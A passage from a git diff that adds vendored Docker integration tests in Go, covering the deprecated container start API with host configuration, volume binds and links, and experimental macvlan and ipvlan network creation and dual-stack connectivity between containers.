+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "trap 'exit 99' TERM; while true; do usleep 10; done")
+	containerID := strings.TrimSpace(out)
+	c.Assert(waitRun(containerID), checker.IsNil)
+
+	chWait := make(chan error)
+	waitCmd := exec.Command(dockerBinary, "wait", containerID)
+	waitCmdOut := bytes.NewBuffer(nil)
+	waitCmd.Stdout = waitCmdOut
+	c.Assert(waitCmd.Start(), checker.IsNil)
+	go func() {
+		chWait <- waitCmd.Wait()
+	}()
+
+	dockerCmd(c, "stop", containerID)
+
+	select {
+	case err := <-chWait:
+		c.Assert(err, checker.IsNil, check.Commentf(waitCmdOut.String()))
+		status, err := waitCmdOut.ReadString('\n')
+		c.Assert(err, checker.IsNil)
+		c.Assert(strings.TrimSpace(status), checker.Equals, "99", check.Commentf("expected exit 99, got %s", status))
+	case <-time.After(2 * time.Second):
+		waitCmd.Process.Kill()
+		c.Fatal("timeout waiting for `docker wait` to exit")
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go
new file mode 100644
index 0000000000..7bc287eca7
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go
@@ -0,0 +1,227 @@
+// This file will be removed when we completely drop support for
+// passing HostConfig to container start API.
+
+package main
+
+import (
+	"net/http"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func formatV123StartAPIURL(url string) string {
+	return "/v1.23" + url
+}
+
+func (s *DockerSuite) TestDeprecatedContainerAPIStartHostConfig(c *check.C) {
+	name := "test-deprecated-api-124"
+	dockerCmd(c, "create", "--name", name, "busybox")
+	config := map[string]interface{}{
+		"Binds": []string{"/aa:/bb"},
+	}
+	status, body, err := sockRequest("POST", "/containers/"+name+"/start", config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusBadRequest)
+	c.Assert(string(body), checker.Contains, "was deprecated since v1.10")
+}
+
+func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumeBinds(c *check.C) {
+	// TODO Windows CI: Investigate further why this fails on Windows to Windows CI.
+	testRequires(c, DaemonIsLinux)
+	path := "/foo"
+	if daemonPlatform == "windows" {
+		path = `c:\foo`
+	}
+	name := "testing"
+	config := map[string]interface{}{
+		"Image":   "busybox",
+		"Volumes": map[string]struct{}{path: {}},
+	}
+
+	status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+
+	bindPath := randomTmpDirPath("test", daemonPlatform)
+	config = map[string]interface{}{
+		"Binds": []string{bindPath + ":" + path},
+	}
+	status, _, err = sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNoContent)
+
+	pth, err := inspectMountSourceField(name, path)
+	c.Assert(err, checker.IsNil)
+	c.Assert(pth, checker.Equals, bindPath, check.Commentf("expected volume host path to be %s, got %s", bindPath, pth))
+}
+
+// Test for GH#10618
+func (s *DockerSuite) TestDeprecatedContainerAPIStartDupVolumeBinds(c *check.C) {
+	// TODO Windows to Windows CI - Port this
+	testRequires(c, DaemonIsLinux)
+	name := "testdups"
+	config := map[string]interface{}{
+		"Image":   "busybox",
+		"Volumes": map[string]struct{}{"/tmp": {}},
+	}
+
+	status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+
+	bindPath1 := randomTmpDirPath("test1", daemonPlatform)
+	bindPath2 := randomTmpDirPath("test2", daemonPlatform)
+
+	config = map[string]interface{}{
+		"Binds": []string{bindPath1 + ":/tmp", bindPath2 + ":/tmp"},
+	}
+	status, body, err := sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+	c.Assert(string(body), checker.Contains, "Duplicate mount point", check.Commentf("Expected failure due to duplicate bind mounts to same path, instead got: %q with error: %v", string(body), err))
+}
+
+func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumesFrom(c *check.C) {
+	// TODO Windows to Windows CI - Port this
+	testRequires(c, DaemonIsLinux)
+	volName := "voltst"
+	volPath := "/tmp"
+
+	dockerCmd(c, "run", "--name", volName, "-v", volPath, "busybox")
+
+	name := "TestContainerAPIStartVolumesFrom"
+	config := map[string]interface{}{
+		"Image":   "busybox",
+		"Volumes": map[string]struct{}{volPath: {}},
+	}
+
+	status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+
+	config = map[string]interface{}{
+		"VolumesFrom": []string{volName},
+	}
+	status, _, err = sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNoContent)
+
+	pth, err := inspectMountSourceField(name, volPath)
+	c.Assert(err, checker.IsNil)
+	pth2, err := inspectMountSourceField(volName, volPath)
+	c.Assert(err, checker.IsNil)
+	c.Assert(pth, checker.Equals, pth2, check.Commentf("expected volume host path to be %s, got %s", pth, pth2))
+}
+
+// #9981 - Allow a docker created volume (ie, one in /var/lib/docker/volumes) to be used to overwrite (via passing in Binds on api start) an existing volume
+func (s *DockerSuite) TestDeprecatedPostContainerBindNormalVolume(c *check.C) {
+	// TODO Windows to Windows CI - Port this
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "create", "-v", "/foo", "--name=one", "busybox")
+
+	fooDir, err := inspectMountSourceField("one", "/foo")
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "create", "-v", "/foo", "--name=two", "busybox")
+
+	bindSpec := map[string][]string{"Binds": {fooDir + ":/foo"}}
+	status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/two/start"), bindSpec)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNoContent)
+
+	fooDir2, err := inspectMountSourceField("two", "/foo")
+	c.Assert(err, checker.IsNil)
+	c.Assert(fooDir2, checker.Equals, fooDir, check.Commentf("expected volume path to be %s, got: %s", fooDir, fooDir2))
+}
+
+func (s *DockerSuite) TestDeprecatedStartWithTooLowMemoryLimit(c *check.C) {
+	// TODO Windows: Port once memory is supported
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "create", "busybox")
+
+	containerID := strings.TrimSpace(out)
+
+	config := `{
+                "CpuShares": 100,
+                "Memory":    524287
+        }`
+
+	res, body, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+containerID+"/start"), strings.NewReader(config), "application/json")
+	c.Assert(err, checker.IsNil)
+	b, err2 := readBody(body)
+	c.Assert(err2, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	c.Assert(string(b), checker.Contains, "Minimum memory limit allowed is 4MB")
+}
+
+// #14640
+func (s *DockerSuite) TestDeprecatedPostContainersStartWithoutLinksInHostConfig(c *check.C) {
+	// TODO Windows: Windows doesn't support supplying a hostconfig on start.
+	// An alternate test could be written to validate the negative testing aspect of this
+	testRequires(c, DaemonIsLinux)
+	name := "test-host-config-links"
+	dockerCmd(c, append([]string{"create", "--name", name, "busybox"}, sleepCommandForDaemonPlatform()...)...)
+
+	hc := inspectFieldJSON(c, name, "HostConfig")
+	config := `{"HostConfig":` + hc + `}`
+
+	res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent)
+	b.Close()
+}
+
+// #14640
+func (s *DockerSuite) TestDeprecatedPostContainersStartWithLinksInHostConfig(c *check.C) {
+	// TODO Windows: Windows doesn't support supplying a hostconfig on start.
+	// An alternate test could be written to validate the negative testing aspect of this
+	testRequires(c, DaemonIsLinux)
+	name := "test-host-config-links"
+	dockerCmd(c, "run", "--name", "foo", "-d", "busybox", "top")
+	dockerCmd(c, "create", "--name", name, "--link", "foo:bar", "busybox", "top")
+
+	hc := inspectFieldJSON(c, name, "HostConfig")
+	config := `{"HostConfig":` + hc + `}`
+
+	res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent)
+	b.Close()
+}
+
+// #14640
+func (s *DockerSuite) TestDeprecatedPostContainersStartWithLinksInHostConfigIdLinked(c *check.C) {
+	// Windows does not support links
+	testRequires(c, DaemonIsLinux)
+	name := "test-host-config-links"
+	out, _ := dockerCmd(c, "run", "--name", "link0", "-d", "busybox", "top")
+	id := strings.TrimSpace(out)
+	dockerCmd(c, "create", "--name", name, "--link", id, "busybox", "top")
+
+	hc := inspectFieldJSON(c, name, "HostConfig")
+	config := `{"HostConfig":` + hc + `}`
+
+	res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent)
+	b.Close()
+}
+
+func (s *DockerSuite) TestDeprecatedStartWithNilDNS(c *check.C) {
+	// TODO Windows: Add once DNS is supported
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "create", "busybox")
+	containerID := strings.TrimSpace(out)
+
+	config := `{"HostConfig": {"Dns": null}}`
+
+	res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+containerID+"/start"), strings.NewReader(config), "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent)
+	b.Close()
+
+	dns := inspectFieldJSON(c, containerID, "HostConfig.Dns")
+	c.Assert(dns, checker.Equals, "[]")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go
new file mode 100644
index 0000000000..94ef9b1a00
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go
@@ -0,0 +1,30 @@
+// +build !windows
+
+package main
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// #19100 This is a deprecated feature test, it should be removed in Docker 1.12
+func (s *DockerNetworkSuite) TestDeprecatedDockerNetworkStartAPIWithHostconfig(c *check.C) {
+	netName := "test"
+	conName := "foo"
+	dockerCmd(c, "network", "create", netName)
+	dockerCmd(c, "create", "--name", conName, "busybox", "top")
+
+	config := map[string]interface{}{
+		"HostConfig": map[string]interface{}{
+			"NetworkMode": netName,
+		},
+	}
+	_, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/"+conName+"/start"), config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(waitRun(conName), checker.IsNil)
+	networks := inspectField(c, conName, "NetworkSettings.Networks")
+	c.Assert(networks, checker.Contains, netName, check.Commentf(fmt.Sprintf("Should contain '%s' network", netName)))
+	c.Assert(networks, checker.Not(checker.Contains), "bridge", check.Commentf("Should not contain 'bridge' network"))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go b/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go
new file mode 100644
index 0000000000..85dec31948
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go
@@ -0,0 +1,594 @@
+// +build !windows
+
+package main
+
+import (
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/pkg/parsers/kernel"
+	"github.com/go-check/check"
+)
+
+var (
+	MacvlanKernelSupport = testRequirement{
+		func() bool {
+			const macvlanKernelVer = 3 // minimum macvlan kernel support
+			const macvlanMajorVer = 9  // minimum macvlan major kernel support
+			kv, err := kernel.GetKernelVersion()
+			if err != nil {
+				return false
+			}
+			// ensure Kernel version is >= v3.9 for macvlan support
+			if kv.Kernel < macvlanKernelVer || (kv.Kernel == macvlanKernelVer && kv.Major < macvlanMajorVer) {
+				return false
+			}
+			return true
+		},
+		"kernel version failed to meet the minimum macvlan kernel requirement of 3.9",
+	}
+	IpvlanKernelSupport = testRequirement{
+		func() bool {
+			const ipvlanKernelVer = 4 // minimum ipvlan kernel support
+			const ipvlanMajorVer = 2  // minimum ipvlan major kernel support
+			kv, err := kernel.GetKernelVersion()
+			if err != nil {
+				return false
+			}
+			// ensure Kernel version is >= v4.2 for ipvlan support
+			if kv.Kernel < ipvlanKernelVer || (kv.Kernel == ipvlanKernelVer && kv.Major < ipvlanMajorVer) {
+				return false
+			}
+			return true
+		},
+		"kernel version failed to meet the minimum ipvlan kernel requirement of 4.0.0",
+	}
+)
+
+func (s *DockerNetworkSuite) TestDockerNetworkMacvlanPersistance(c *check.C) {
+	// verify the driver automatically provisions the 802.1q link (dm-dummy0.60)
+	testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+
+	// master dummy interface 'dm' abbreviation represents 'docker macvlan'
+	master := "dm-dummy0"
+	// simulate the master link the vlan tagged subinterface parent link will use
+	out, err := createMasterDummy(c, master)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	// create a network specifying the desired sub-interface name
+	dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.60", "dm-persist")
+	assertNwIsAvailable(c, "dm-persist")
+	// Restart docker daemon to test the config has persisted to disk
+	s.d.Restart()
+	// verify network is recreated from persistence
+	assertNwIsAvailable(c, "dm-persist")
+	// cleanup the master interface that also collects the slave dev
+	deleteInterface(c, "dm-dummy0")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkIpvlanPersistance(c *check.C) {
+	// verify the driver automatically provisions the 802.1q link (di-dummy0.70)
+	testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	// master dummy interface 'di' notation represent 'docker ipvlan'
+	master := "di-dummy0"
+	// simulate the master link the vlan tagged subinterface parent link will use
+	out, err := createMasterDummy(c, master)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	// create a network specifying the desired sub-interface name
+	dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.70", "di-persist")
+	assertNwIsAvailable(c, "di-persist")
+	// Restart docker daemon to test the config has persisted to disk
+	s.d.Restart()
+	// verify network is recreated from persistence
+	assertNwIsAvailable(c, "di-persist")
+	// cleanup the master interface that also collects the slave dev
+	deleteInterface(c, "di-dummy0")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkMacvlanSubIntCreate(c *check.C) {
+	// verify the driver automatically provisions the 802.1q link (dm-dummy0.50)
+	testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	// master dummy interface 'dm' abbreviation represents 'docker macvlan'
+	master := "dm-dummy0"
+	// simulate the master link the vlan tagged subinterface parent link will use
+	out, err := createMasterDummy(c, master)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	// create a network specifying the desired sub-interface name
+	dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.50", "dm-subinterface")
+	assertNwIsAvailable(c, "dm-subinterface")
+	// cleanup the master interface which also collects the slave dev
+	deleteInterface(c, "dm-dummy0")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkIpvlanSubIntCreate(c *check.C) {
+	// verify the driver automatically provisions the 802.1q link (di-dummy0.50)
+	testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	// master dummy interface 'dm' abbreviation represents 'docker ipvlan'
+	master := "di-dummy0"
+	// simulate the master link the vlan tagged subinterface parent link will use
+	out, err := createMasterDummy(c, master)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	// create a network specifying the desired sub-interface name
+	dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.60", "di-subinterface")
+	assertNwIsAvailable(c, "di-subinterface")
+	// cleanup the master interface which also collects the slave dev
+	deleteInterface(c, "di-dummy0")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkMacvlanOverlapParent(c *check.C) {
+	// verify the same parent interface cannot be used if already in use by an existing network
+	testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	// master dummy interface 'dm' abbreviation represents 'docker macvlan'
+	master := "dm-dummy0"
+	out, err := createMasterDummy(c, master)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	out, err = createVlanInterface(c, master, "dm-dummy0.40", "40")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	// create a network using an existing parent interface
+	dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.40", "dm-subinterface")
+	assertNwIsAvailable(c, "dm-subinterface")
+	// attempt to create another network using the same parent iface that should fail
+	out, _, err = dockerCmdWithError("network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.40", "dm-parent-net-overlap")
+	// verify that the overlap returns an error
+	c.Assert(err, check.NotNil)
+	// cleanup the master interface which also collects the slave dev
+	deleteInterface(c, "dm-dummy0")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkIpvlanOverlapParent(c *check.C) {
+	// verify the same parent interface cannot be used if already in use by an existing network
+	testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	// master dummy interface 'dm' abbreviation represents 'docker ipvlan'
+	master := "di-dummy0"
+	out, err := createMasterDummy(c, master)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	out, err = createVlanInterface(c, master, "di-dummy0.30", "30")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	// create a network using an existing parent interface
+	dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.30", "di-subinterface")
+	assertNwIsAvailable(c, "di-subinterface")
+	// attempt to create another network using the same parent iface that should fail
+	out, _, err = dockerCmdWithError("network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.30", "di-parent-net-overlap")
+	// verify that the overlap returns an error
+	c.Assert(err, check.NotNil)
+	// cleanup the master interface which also collects the slave dev
+	deleteInterface(c, "di-dummy0")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkMacvlanMultiSubnet(c *check.C) {
+	// create a dual stack multi-subnet Macvlan bridge mode network and validate connectivity between four containers, two on each subnet
+	testRequires(c, DaemonIsLinux, IPv6, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	dockerCmd(c, "network", "create", "--driver=macvlan", "--ipv6", "--subnet=172.28.100.0/24", "--subnet=172.28.102.0/24", "--gateway=172.28.102.254",
+		"--subnet=2001:db8:abc2::/64", "--subnet=2001:db8:abc4::/64", "--gateway=2001:db8:abc4::254", "dualstackbridge")
+	// Ensure the network was created
+	assertNwIsAvailable(c, "dualstackbridge")
+	// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.100.0/24 and 2001:db8:abc2::/64
+	dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=first", "--ip", "172.28.100.20", "--ip6", "2001:db8:abc2::20", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=second", "--ip", "172.28.100.21", "--ip6", "2001:db8:abc2::21", "busybox", "top")
+
+	// Inspect and store the v4 address from specified container on the network dualstackbridge
+	ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.IPAddress")
+	// Inspect and store the v6 address from specified container on the network dualstackbridge
+	ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.GlobalIPv6Address")
+
+	// verify ipv4 connectivity to the explicit --ipv address second to first
+	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip))
+	c.Assert(err, check.IsNil)
+	// verify ipv6 connectivity to the explicit --ipv6 address second to first
+	c.Skip("Temporarily skipping while invesitigating sporadic v6 CI issues")
+	_, _, err = dockerCmdWithError("exec", "second", "ping6", "-c", "1", strings.TrimSpace(ip6))
+	c.Assert(err, check.IsNil)
+
+	// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.102.0/24 and 2001:db8:abc4::/64
+	dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=third", "--ip", "172.28.102.20", "--ip6", "2001:db8:abc4::20", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=fourth", "--ip", "172.28.102.21", "--ip6", "2001:db8:abc4::21", "busybox", "top")
+
+	// Inspect and store the v4 address from specified container on the network dualstackbridge
+	ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.IPAddress")
+	// Inspect and store the v6 address from specified container on the network dualstackbridge
+	ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.GlobalIPv6Address")
+
+	// verify ipv4 connectivity to the explicit --ipv address from third to fourth
+	_, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip))
+	c.Assert(err, check.IsNil)
+	// verify ipv6 connectivity to the explicit --ipv6 address from third to fourth
+	_, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6))
+	c.Assert(err, check.IsNil)
+
+	// Inspect the v4 gateway to ensure the proper default GW was assigned
+	ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.Gateway")
+	c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.100.1")
+	// Inspect the v6 gateway to ensure the proper default GW was assigned
+	ip6gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.IPv6Gateway")
+	c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc2::1")
+
+	// Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned
+	ip4gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.Gateway")
+	c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.102.254")
+	// Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned
+	ip6gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.IPv6Gateway")
+	c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc4::254")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkIpvlanL2MultiSubnet(c *check.C) {
+	// create a dual stack multi-subnet Ipvlan L2 network and validate connectivity within the subnets, two on each subnet
+	testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.200.0/24", "--subnet=172.28.202.0/24", "--gateway=172.28.202.254",
+		"--subnet=2001:db8:abc8::/64", "--subnet=2001:db8:abc6::/64", "--gateway=2001:db8:abc6::254", "dualstackl2")
+	// Ensure the network was created
+	assertNwIsAvailable(c, "dualstackl2")
+	// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.200.0/24 and 2001:db8:abc8::/64
+	dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=first", "--ip", "172.28.200.20", "--ip6", "2001:db8:abc8::20", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=second", "--ip", "172.28.200.21", "--ip6", "2001:db8:abc8::21", "busybox", "top")
+
+	// Inspect and store the v4 address from specified container on the network dualstackl2
+	ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.IPAddress")
+	// Inspect and store the v6 address from specified container on the network dualstackl2
+	ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.GlobalIPv6Address")
+
+	// verify ipv4 connectivity to the explicit --ipv address second to first
+	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip))
+	c.Assert(err, check.IsNil)
+	// verify ipv6 connectivity to the explicit --ipv6 address second to first
+	_, _, err = dockerCmdWithError("exec", "second", "ping6", "-c", "1", strings.TrimSpace(ip6))
+	c.Assert(err, check.IsNil)
+
+	// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.202.0/24 and 2001:db8:abc6::/64
+	dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=third", "--ip", "172.28.202.20", "--ip6", "2001:db8:abc6::20", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=fourth", "--ip", "172.28.202.21", "--ip6", "2001:db8:abc6::21", "busybox", "top")
+
+	// Inspect and store the v4 address from specified container on the network dualstackl2
+	ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.IPAddress")
+	// Inspect and store the v6 address from specified container on the network dualstackl2
+	ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.GlobalIPv6Address")
+
+	// verify ipv4 connectivity to the explicit --ipv address from third to fourth
+	_, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip))
+	c.Assert(err, check.IsNil)
+	// verify ipv6 connectivity to the explicit --ipv6 address from third to fourth
+	_, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6))
+	c.Assert(err, check.IsNil)
+
+	// Inspect the v4 gateway to ensure the proper default GW was assigned
+	ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.Gateway")
+	c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.200.1")
+	// Inspect the v6 gateway to ensure the proper default GW was assigned
+	ip6gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.IPv6Gateway")
+	c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc8::1")
+
+	// Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned
+	ip4gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.Gateway")
+	c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.202.254")
+	// Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned
+	ip6gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.IPv6Gateway")
+	c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc6::254")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkIpvlanL3MultiSubnet(c *check.C) {
+	// create a dual stack multi-subnet Ipvlan L3 network and validate connectivity between all four containers per L3 mode
+	testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, IPv6, ExperimentalDaemon)
+	dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.10.0/24", "--subnet=172.28.12.0/24", "--gateway=172.28.12.254",
+		"--subnet=2001:db8:abc9::/64", "--subnet=2001:db8:abc7::/64", "--gateway=2001:db8:abc7::254", "-o", "ipvlan_mode=l3", "dualstackl3")
+	// Ensure the network was created
+	assertNwIsAvailable(c, "dualstackl3")
+
+	// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.10.0/24 and 2001:db8:abc9::/64
+	dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=first", "--ip", "172.28.10.20", "--ip6", "2001:db8:abc9::20", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=second", "--ip", "172.28.10.21", "--ip6", "2001:db8:abc9::21", "busybox", "top")
+
+	// Inspect and store the v4 address from specified container on the network dualstackl3
+	ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.IPAddress")
+	// Inspect and store the v6 address from specified container on the network dualstackl3
+	ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address")
+
+	// verify ipv4 connectivity to the explicit --ipv address second to first
+	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip))
+	c.Assert(err, check.IsNil)
+	// verify ipv6 connectivity to the explicit --ipv6 address second to first
+	_, _, err = dockerCmdWithError("exec", "second", "ping6", "-c", "1", strings.TrimSpace(ip6))
+	c.Assert(err, check.IsNil)
+
+	// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.12.0/24 and 2001:db8:abc7::/64
+	dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=third", "--ip", "172.28.12.20", "--ip6", "2001:db8:abc7::20", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=fourth", "--ip", "172.28.12.21", "--ip6", "2001:db8:abc7::21", "busybox", "top")
+
+	// Inspect and store the v4 address from specified container on the network dualstackl3
+	ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.IPAddress")
+	// Inspect and store the v6 address from specified container on the network dualstackl3
+	ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address")
+
+	// verify ipv4 connectivity to the explicit --ipv address from third to fourth
+	_, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip))
+	c.Assert(err, check.IsNil)
+	// verify ipv6 connectivity to the explicit --ipv6 address from third to fourth
+	_, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6))
+	c.Assert(err, check.IsNil)
+
+	// Inspect and store the v4 address from specified container on the network dualstackl3
+	ip = inspectField(c, "second", "NetworkSettings.Networks.dualstackl3.IPAddress")
